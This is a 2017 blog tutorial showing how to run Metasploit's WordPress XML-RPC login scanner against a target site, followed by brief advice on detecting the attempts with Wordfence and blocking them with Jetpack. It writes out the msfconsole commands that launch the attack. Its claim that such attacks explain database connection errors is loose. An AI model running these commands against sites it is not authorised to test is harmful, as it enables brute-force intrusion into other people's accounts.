![Meta Exploit LogixTree](https://logixtree.in/wp-content/uploads/2017/01/metaexploid.jpg)

How to do XMLRPC Attack on a WordPress Website in Metasploit
============================================================

January 19, 2017

[Karanbir Singh](https://logixtree.in/author/geek-karan/)

[CEH](https://logixtree.in/category/hacking/ceh/), [Certified Ethical Hacking](https://logixtree.in/category/hacking/certified-ethical-hacking/), [Hacking](https://logixtree.in/category/hacking/), [Kali Linux](https://logixtree.in/category/hacking/kali-linux/), [WordPress](https://logixtree.in/category/wordpress/)

[No Comments](https://logixtree.in/xmlrpc-attach-wordpress-website-metasploit/#respond)

XMLRPC is a very common form of attack that happens on a wordpress website and evantually make your site go offline. If your are frequently getting the error "Error establishing a database connection" chances are farely high that is because of XMLRPC attack.

How to attack a website using XMLRPC exploit using Metasploit
-------------------------------------------------------------

-   Open the Metasploit Framework with the command

> root@logixtree:~$msfconsole (press enter)

-   Search for the XMLRPC exploit for WordPress. For which use the below command. The word xmlrpc is the string we are searching in the name of the exploits. Change the string to something else to search for other exploit.

> msf > search xmlrpc (press enter)

After the search is complete you will get a list of all exploits that match your search. Copy the one that looks like this -- auxiliary/scanner/http/wordpress_xmlrpc_login

[![](https://logixtree.in/wp-content/uploads/2017/01/list-of-exploits-in-wordpress-xmlrps-metasploit-logixtree-1024x268.png)](https://logixtree.in/wp-content/uploads/2017/01/list-of-exploits-in-wordpress-xmlrps-metasploit-logixtree.png)

-   Put the exploit into Use. Once the below command is executed the prompt will start showing the exploit.

> msf > use auxiliary/scanner/http/wordpress_xmlrpc_login (press enter)

-   msf auxiliary(wordpress_xmlrpc_login) > set RHOSTS targetwebsiteurl.com (press enter)

where targetwebsiteurl.com can be your website if you are looking for weeknesses into your own site. We are not responsible if you use these exploits to screw someone else's website.

-   Final step would be to start the attack using the run command.

> msf auxiliary(wordpress_xmlrpc_login) > run (press enter)

How to detect an XMLRPC attack![](https://logixtree.in/wp-content/uploads/2017/01/wordfence-logo-square-logixtree-get-a-wordpress-website-290x300.jpg)
------------------------------------------------------------------------------------------------------------------------------------------------------

Usually if you are getting "Error establishing a database connection" that can be a sign of XMLRPC attack. To cross verify the same you can install a wordpress plugin "WordFence" which is one of the most popular security plugin in wordpress

After installation and configuring the Wordfence plugin, from the left menu hover on Wordfence button and click on Live Traffic. This will show you all the traffic that is comming on your website. If some one is accessing the xmlrpc.php file than it is because of a xmlrpc.php attack.

[![](https://logixtree.in/wp-content/uploads/2017/01/XMLRPC-Attack-Attempt-Logixtree.png)](https://logixtree.in/wp-content/uploads/2017/01/XMLRPC-Attack-Attempt-Logixtree.png)

How to Protect Yourself from an XMLRPC Attack
---------------------------------------------

Easiest way is to do it is using the plugin Jetpack. It has security features that stop the XMLPRC attach. You can also use other plugins that are explicitly developed to stop XMLRPC attach.

Feel free to drop us a question if that doesnt solve the problem or if there are any dobuts.